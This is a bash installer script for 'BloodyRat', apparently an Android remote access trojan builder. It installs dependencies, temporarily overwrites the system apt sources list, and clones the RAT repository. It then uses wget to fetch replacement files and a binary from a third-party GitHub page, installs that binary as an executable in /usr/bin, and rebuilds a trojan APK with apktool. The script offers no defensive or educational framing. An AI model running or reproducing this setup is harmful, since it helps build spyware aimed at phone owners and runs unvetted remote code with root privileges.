#! /bin/bash


#colors
white="\033[1;37m"                                          ##
grey="\033[0;37m"                                           ##
purple="\033[1;35m"                                         ##
red="\033[1;31m"                                            ##
green="\033[1;32m"                                          ##
yellow="\033[1;33m"                                         ##
purple="\033[0;35m"                                         ##
cyan="\033[0;36m"                                           ##
cyan1="\033[1;36m"                                          ##
cafe="\033[0;33m"                                           ##
fiuscha="\033[0;35m"                                        ##
blue="\033[1;34m"                                           ##
nc="\033[0m"                                                ## 

main="/usr/share/BloodyRat"
source="/etc/apt/sources.list"
old_source="/etc/apt/SL.bk"
smali_path="${main}/server/app/factory/decompiled"

function dependencies() {
if [[ `command -v git` && `command -v wget` && `command -v nodejs` && `command -v npm` && `command -v apktool` ]]; then
		dependencies=true		
	else
		pkgs=(git wget nodejs npm apktool)
		for pkg in "${pkgs[@]}"; do
			type -p "$pkg" &>/dev/null || {
			apt install "$pkg" -y 
			}
			done
	fi
}

function update_source() {
	sudo cat ${source} > ${old_source}
        sudo echo 'deb http://security.debian.org/debian-security stretch/updates main' > ${source}
	sudo apt update -y && sudo apt install openjdk-8-jdk
	sudo cat ${old_source} > ${source}
}

function main() {
	[ -d "${main}" ] && rm -rf ${main} > /dev/null 2>&1
	(git clone https://github.com/Bhaviktutorials/BloodyRat --quiet ${main})
        sudo update-alternatives --set java /usr/lib/jvm/java-8-openjdk*/jre/bin/java
	cd ${main}/server && npm install
}

function fix_patches() {
	wget -N https://github.com/just-hack/just-hack.github.io/raw/main/BloodyRat/const.js -q -O ${main}/server/includes/const.js
	wget -N https://github.com/just-hack/just-hack.github.io/raw/main/BloodyRat/BloodyRat -q -O /usr/bin/BloodyRat && chmod +x /usr/bin/BloodyRat
	cd /usr/share/BloodyRat/server/app/factory/
	apktool b decompiled/ --use-aapt2 -o ${HOME}/new.apk
}

##########
# DRIVER #
##########

dependencies
update_source
main
fix_patches
